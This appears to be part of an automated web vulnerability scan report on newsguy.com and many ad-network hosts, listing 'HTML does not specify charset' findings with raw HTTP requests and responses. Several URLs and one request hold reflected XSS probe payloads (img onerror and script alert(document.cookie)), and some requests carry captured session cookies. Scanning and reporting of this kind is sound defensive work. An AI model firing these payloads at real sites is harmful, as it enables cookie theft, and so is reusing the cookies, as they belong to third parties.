Cookie: daily_freq_cap=WzI0LTEtMjAxMXwzNDE0fDFdWzI0LTEtMjAxMXwzMTA4fDFdWzI0LTEtMjAxMXwyOTAxfDFd; weekly_freq_cap=WzUtMjAxMXwzNDE0fDFdWzUtMjAxMXwzMTA4fDFdWzUtMjAxMXwyOTAxfDFd; monthly_freq_cap=WzEtMjAxMXwzNDE0fDFdWzEtMjAxMXwzMTA4fDFdWzEtMjAxMXwyOTAxfDFd;

Response

HTTP/1.1 404 /
Date: Mon, 24 Jan 2011 15:01:46 GMT
Cache-Control: no-cache
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 212

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>DOCLIX - Page Not Found!</title></head><body><h3>Sorry, but the page you have requested has not been found.</h3></
...[SNIP]...

30. HTML does not specify charset previous next
There are 166 instances of this issue:

https://acc.newsguy.com/a/memsubmit.asp
https://acc.newsguy.com/cgi-bin/login_frm
https://acc.newsguy.com/cgi-bin/ngexpress_form
https://acc.newsguy.com/cgi-bin/sub_form
https://acc.newsguy.com/cgi-bin/sub_spot_form
https://acc.newsguy.com/cgi-bin/sub_trial_form
https://acc.newsguy.com/cgi-bin/sub_unlmt_form
https://acc.newsguy.com/cgi-bin/usenetports
https://acc.newsguy.com/lotto_bonuspicks.htm
https://acc.newsguy.com/lotto_details.htm
https://acc.newsguy.com/requestid.htm
https://acc.newsguy.com/user/-/accnt_billing
https://acc.newsguy.com/user/-/accnt_contact
https://acc.newsguy.com/user/-/accnt_flash
https://acc.newsguy.com/user/-/accnt_history
https://acc.newsguy.com/user/-/customer_referrals
https://acc.newsguy.com/user/-/referrals_cashout
https://acc.newsguy.com/user/accnt_overview
https://acc.newsguy.com/user/accnt_renew
https://acc.newsguy.com/user/accnt_settings
https://acc.newsguy.com/user/accnt_signup_usenet
https://acc.newsguy.com/user/accnt_upgrade
http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91
http://ads.pointroll.com/PortalServe/
http://adserver.teracent.net/favicon.ico
http://api.tweetmeme.com/url_info.jsonc
http://b3.mookie1.com/2/B3DM/DLX/1@x71
http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
http://c5.zedo.com/ads3/i/
http://c5.zedo.com/jsc/c5/ff2.html
http://cdn.apture.com/media/html/aptureLoadIframe.html
http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html
http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html
http://classiccars.com/go/homepage_TOL.html
http://classiccars.com/go/research_TOL.html
http://classiccars.com/go/sell_TOL.html
http://dave.willfork.com/slrnface/
http://delb.opt.fimserve.com/favicon.ico
http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23
http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92
http://dm.de.mookie1.com/2/B3DM/DLX/@x94
http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json
http://famspam.com/facebox/
http://fls.doubleclick.net/activityi
http://golded-plus.sourceforge.net/
http://grn.sourceforge.net/
http://home.big.or.jp/
http://hostedusa3.whoson.com/
http://hostedusa3.whoson.com/include.js
http://hostedusa3.whoson.com/invite.js
http://husky.sourceforge.net/
http://ib.adnxs.com/ptj
http://ifmail.sourceforge.net/
http://jqueryui.com/about
http://jqueryui.com/themeroller/
http://loadus.exelator.com/load/net.php
http://mako.cc/projects/aub/
http://mako.cc/projects/aub/docs/aub.1.html
http://mako.cc/projects/aub/docs/aubconf.1.html
http://media.fastclick.net/w/pg
http://media.fastclick.net/w/win.bid
http://mediacdn.disqus.com/1295633860
http://mediacdn.disqus.com/1295633860/html/xdm.html
http://mig.nexac.com/2/B3DM/DLX/1@x96
http://netwinsite.com/
http://newsgrab.sourceforge.net/
http://newsguy.com/
http://newsguy.com/accountbandwidth.htm
http://newsguy.com/accountemail.htm
http://newsguy.com/affiliate.htm
http://newsguy.com/allinone.htm
http://newsguy.com/birthday.htm
http://newsguy.com/bonusbytes.htm
http://newsguy.com/cellphone.htm
http://newsguy.com/commd6.htm
http://newsguy.com/contact.htm
http://newsguy.com/copy.htm
http://newsguy.com/diagnostics.htm
http://newsguy.com/email.htm
http://newsguy.com/groups.htm
http://newsguy.com/ispcon.htm
http://newsguy.com/members.htm
http://newsguy.com/msgpanel/message.asp
http://newsguy.com/news.asp
http://newsguy.com/news.htm
http://newsguy.com/newsguys.htm
http://newsguy.com/overview.htm
http://newsguy.com/policy.htm
http://newsguy.com/services.htm
http://newsguy.com/user_info.asp
http://noisybox.net/computers/nzbperl/
http://people.joomla.org/modules/mod_pixsearch_ng/media/js/gpixsearch/EC114CAD1010D1980F044A461CE47B22.cache.html
http://pessoal.org/papercut/
http://picmonger.sourceforge.net/
http://r.nexac.com/e/getdata.xgi
http://seattletimes.nwsource.com/html/businesstechnology/2014020427_amazon24.html/x22
http://sites.inka.de/~bigred/sw/c-nocem.html
http://tags.bluekai.com/site/10
http://tweetmeme.com/channels
http://tweetmeme.com/media/image
http://tweetmeme.com/media/video
http://tweetmeme.com/popup/follow
http://tweetmeme.com/popup/tweet
http://tweetmeme.com/story/3832254868/htc-hd2-can-now-dual-boot-windows-phone-7-and-android-promises-to-love-them-equally-engadget
http://tweetmeme.com/style/week
http://uac.advertising.com/wrapper/aceUACping.htm
http://venedet.michnica.net/download/donate.html
http://whdhstore.hipcricket.com/
http://wildspark.com/asher/ija/
http://www.armanijeans-theroom.com/
http://www.aub.org/x22
http://www.autocheck.com/
http://www.autotrader.com/inc/ad.html
http://www.autotraderclassics.com/find/index.xhtml/x22
http://www.autotraderclassics.com/x22
http://www.bymnews.com/news/newsList.php
http://www.careersingear.com/
http://www.carsdirect.com/x22
http://www.freebsd.org/cgi/url.cgi
http://www.google.com/instant/
http://www.google.com/intl/en/about.html
http://www.google.com/intl/en/ads/
http://www.google.com/intl/en/options/
http://www.mit.edu/people/jik/software/xrn.html
http://www.munit.co.uk/
https://www.mytraderonline.com/css/promoCSS.php
https://www.mytraderonline.com/css/tolhomecss.php
https://www.mytraderonline.com/javascript/master_s_code.js
https://www.mytraderonline.com/javascript/realmedia.js
http://www.netlingo.com/includes/category.php
http://www.netlingo.com/iphone/
http://www.netlingo.com/iphone/index.php
http://www.netlingo.com/more/adsizes.php
http://www.netlingo.com/more/color/index.php
http://www.newsguy.com/overview.htm
http://www.newsreaders.com/unix/utilities.html/x22
http://www.nih.at/cg/
http://www.opengroup.org/onlinepubs/009629399/apdxa.htm
http://www.openusenet.org/diablo/
http://www.ossp.org/pkg/tool/lmtp2nntp/
http://www.paperg.com/jsfb/embed.php
http://www.rdrop.com/users/billmc/adcomplain.html
http://www.sailinganarchy.com/ADs/nauticexpo/nauticexpo.htm
http://www.sailinganarchy.com/breymaiersailing.com
http://www.sailinganarchy.com/none
http://www.soundingsonline.com/
http://www.soundingssellmyboat.com/
http://www.traderonline.com/css/promoCSS.php
http://www.traderonline.com/css/tolhomecss.php
http://www.traderonline.com/javascript/master_s_code.js
http://www.traderonline.com/javascript/realmedia.js
http://www.traderpub.com/favicon.ico
http://www.traderpub.com/x22
http://www.vox.com/.shared/css/base.css
http://www.washington.edu/alpine/
http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(String.fromCharCode(88,83,83))%3Ee6e3afeb687/a
http://www.washington.edu/alpinef972a%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ee6e3afeb687/a
http://www.washington.edu/alpinef972a<img
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(String.fromCharCode(88,83,83))>e6e3afeb687/
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(document.cookie
http://www.washington.edu/alpinef972a<img%20src=a%20onerror=alert(document.cookie)>e6e3afeb687/
http://www.washington.edu/pine/
http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354
http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw
http://xads.zedo.com/ads3/a

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

30.1. https://acc.newsguy.com/a/memsubmit.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/a/memsubmit.asp

Request

Response

30.2. https://acc.newsguy.com/cgi-bin/login_frm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/login_frm

Request

Response

30.3. https://acc.newsguy.com/cgi-bin/ngexpress_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/ngexpress_form

Request

Response

30.4. https://acc.newsguy.com/cgi-bin/sub_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/sub_form

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:31 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<head>
<title>Newsguy - Open a Newsgroup Account</title>
<meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space,
software, archives, art & music galleries, feature c
...[SNIP]...

30.5. https://acc.newsguy.com/cgi-bin/sub_spot_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/sub_spot_form

Request

Response

30.6. https://acc.newsguy.com/cgi-bin/sub_trial_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/sub_trial_form

Request

Response

30.7. https://acc.newsguy.com/cgi-bin/sub_unlmt_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/sub_unlmt_form

Request

Response

30.8. https://acc.newsguy.com/cgi-bin/usenetports previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/usenetports

Request

Response

30.9. https://acc.newsguy.com/lotto_bonuspicks.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/lotto_bonuspicks.htm

Request

Response

30.10. https://acc.newsguy.com/lotto_details.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/lotto_details.htm

Request

Response

30.11. https://acc.newsguy.com/requestid.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/requestid.htm

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:46 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Thu, 07 Oct 2004 07:06:01 GMT
ETag: "20be18-be9-4164ead9"
Accept-Ranges: bytes
Content-Length: 3049
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Login / ID Lookup</title>
<meta NAME="description" CONTENT="ID Lookup for Newsguy, a leading provider of
newsgroup access
...[SNIP]...

30.12. https://acc.newsguy.com/user/-/accnt_billing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_billing

Request

Response

30.13. https://acc.newsguy.com/user/-/accnt_contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_contact

Request

Response

30.14. https://acc.newsguy.com/user/-/accnt_flash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_flash

Request

Response

30.15. https://acc.newsguy.com/user/-/accnt_history previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_history

Request

Response

30.16. https://acc.newsguy.com/user/-/customer_referrals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/customer_referrals

Request

Response

30.17. https://acc.newsguy.com/user/-/referrals_cashout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/referrals_cashout

Request

Response

30.18. https://acc.newsguy.com/user/accnt_overview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_overview

Request

Response

30.19. https://acc.newsguy.com/user/accnt_renew previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_renew

Request

Response

30.20. https://acc.newsguy.com/user/accnt_settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_settings

Request

Response

30.21. https://acc.newsguy.com/user/accnt_signup_usenet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_signup_usenet

Request

Response

30.22. https://acc.newsguy.com/user/accnt_upgrade previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_upgrade

Request

Response

30.23. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5875.270604.B3/B5111946.91

Request

Response

30.24. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Request

Response

30.25. http://adserver.teracent.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 /favicon.ico
Server: Apache-Coyote/1.1
ETag: W/"54-1294718145000"
Last-Modified: Tue, 11 Jan 2011 03:55:45 GMT
Content-Type: text/html
Content-Length: 54
Date: Tue, 25 Jan 2011 13:05:11 GMT

<html><body><! Oops, we have a error--></body></html>

30.26. http://api.tweetmeme.com/url_info.jsonc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.tweetmeme.com
Path:	/url_info.jsonc

Request

GET /url_info.jsonc?url=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&callback=aptureJsonCallback1 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 21:11:44 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 400
X-Served-By: h02
Content-Length: 76

aptureJsonCallback1({"status":"failure","comment":"unable to resolve URL"});

30.27. http://b3.mookie1.com/2/B3DM/DLX/1@x71 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/B3DM/DLX/1@x71

Request

GET /2/B3DM/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660; Dominos=DataXuB3; RMFM=011PhXovU106w2; session=1295919344|1295919347

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 783
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var ZAP_id=cookie_c
...[SNIP]...

30.28. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Request

Response

30.29. http://c5.zedo.com/ads3/i/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c5.zedo.com
Path:	/ads3/i/

Request

GET /ads3/i/ HTTP/1.1
Host: c5.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZEDOIDX=29; PI=h749620Za886284Zc305002290%2C305002290Zs788Zt124; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=305,2290,9; ZFFAbh=749B826,20|1483_749#365; FFad=0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
X-Varnish: 1041551373
Expires: Mon, 24 Jan 2011 22:30:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 22:30:23 GMT
Content-Length: 30
Connection: close

<HTML>
<BODY>
</BODY>
</HTML>

30.30. http://c5.zedo.com/jsc/c5/ff2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c5.zedo.com
Path:	/jsc/c5/ff2.html

Request

GET /jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250 HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFgeo=5386156; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1; ZFFAbh=749B826,20|1483_749#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Last-Modified: Wed, 29 Dec 2010 10:51:29 GMT
ETag: "2f6871-8cf-4988a59f54e40"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
X-Varnish: 1882681756 1882646842
Cache-Control: max-age=204814
Expires: Thu, 27 Jan 2011 06:48:20 GMT
Date: Mon, 24 Jan 2011 21:54:46 GMT
Connection: close
Content-Length: 2255


<html>
<head>
<script language="JavaScript">
var c3=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...

30.31. http://cdn.apture.com/media/html/aptureLoadIframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.apture.com
Path:	/media/html/aptureLoadIframe.html

Request

GET /media/html/aptureLoadIframe.html?v=21531601 HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=nbrlsqWMpk

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:41 GMT
Server: PWS/1.7.1.2
X-Px: ht iad-agg-n30.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Sat, 29 Jan 2011 02:07:22 GMT
Age: 241459
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1242
Last-Modified: Sat, 22 Jan 2011 02:03:16 GMT
Connection: keep-alive
Content-Length: 1242



<!DOCTYPE html>
<html>
<body>
<script>apture=window.apture=window.apture||{};aptureCache=apture.fileCache={};aptureCache.lo
...[SNIP]...

30.32. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.cloudscan.us
Path:	/examples/html/sql-injection-xss-cross-site-scripting-dork.html

Request

GET /examples/html/sql-injection-xss-cross-site-scripting-dork.html HTTP/1.1
Host: cdn.cloudscan.us
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=942-1294338785785; __utmz=108330077.1294765608.4.2.utmcsr=cdn.cloudscan.us|utmccn=(referral)|utmcmd=referral|utmcct=/redirect/; __utma=108330077.350499926.1294008031.1294765608.1294772434.5

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Tue, 25 Jan 2011 00:56:35 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

30.33. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.w55c.net
Path:	/i/0Rw6qcLcmo_34070076.html

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

30.34. http://classiccars.com/go/homepage_TOL.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://classiccars.com
Path:	/go/homepage_TOL.html

Request

GET /go/homepage_TOL.html HTTP/1.1
Host: classiccars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 13 Dec 2010 16:58:11 GMT
Accept-Ranges: bytes
ETag: "eff49eece69acb1:0"
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=mBeKa6jyywEkAAAAMTE4YzJiNTgtYzA3YS00M2NmLWFkZDMtZDE0NWY5MmNkNDg1vRRJhjLK7TiHDgYHgyYmeh0F1bZQUjfZse1EhTXv5gM1; expires=Mon, 04-Apr-2011 09:12:28 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:32:27 GMT
Connection: close
Content-Length: 214

<html>
<head>
<meta http-equiv="refresh" content="0;url=http://classiccars.com/home.html?utm_source=traderonline&utm_medium=link&utm_content=home&utm_campaign=collector_cars">
</head>
<body>
</bo
...[SNIP]...

30.35. http://classiccars.com/go/research_TOL.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://classiccars.com
Path:	/go/research_TOL.html

Request

GET /go/research_TOL.html HTTP/1.1
Host: classiccars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 13 Dec 2010 17:00:02 GMT
Accept-Ranges: bytes
ETag: "784d2b2fe79acb1:0"
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=QeQAbqjyywEkAAAAMTdhYWRhYjAtNzRjYy00MGIwLThiMjgtMmY2NGY4YWRlMDE1iXIicmpksJdeKD0NcJ0_gqHFR6NiQieOPVcTSHpyVg01; expires=Mon, 04-Apr-2011 09:12:32 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:32:31 GMT
Connection: close
Content-Length: 233

<html>
<head>
<meta http-equiv="refresh" content="0;url=http://classiccars.com/resource-guide/home.html?utm_source=traderonline&utm_medium=link&utm_content=research&utm_campaign=collector_cars">
</
...[SNIP]...

30.36. http://classiccars.com/go/sell_TOL.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://classiccars.com
Path:	/go/sell_TOL.html

Request

GET /go/sell_TOL.html HTTP/1.1
Host: classiccars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

